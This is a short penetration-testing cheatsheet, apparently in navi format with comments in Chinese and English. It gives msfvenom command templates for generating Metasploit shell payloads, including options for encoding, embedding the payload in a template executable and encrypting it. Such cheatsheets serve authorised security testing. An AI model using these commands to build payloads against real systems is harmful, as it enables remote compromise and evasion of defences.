% linux,pentest_tool
@ var,linux
# msf 快速生成 msfveom fast gen shell
msfvenom -p <msf_payload> LHOST=<ip_address> LPORT=<port> -f <msf_format> -o <path-to-save>

# msf 全选项 msfvenom full gen shell
msfvenom  -p <msf_payload> LHOST=<ip_address> LPORT=<port> -b "<avoid_code>" -e <encoder> -i <encode_count> -x <tempelte> -f <msf_format> -o <path-to-save> --encrypt <encrypt_mothod> --encrypt-key "<encrypt_key>"


$ msf_payload: \cat ~/.cache/msf/payload ---  --column 1
$ msf_format: \cat ~/.cache/msf/format ---  --headers 1
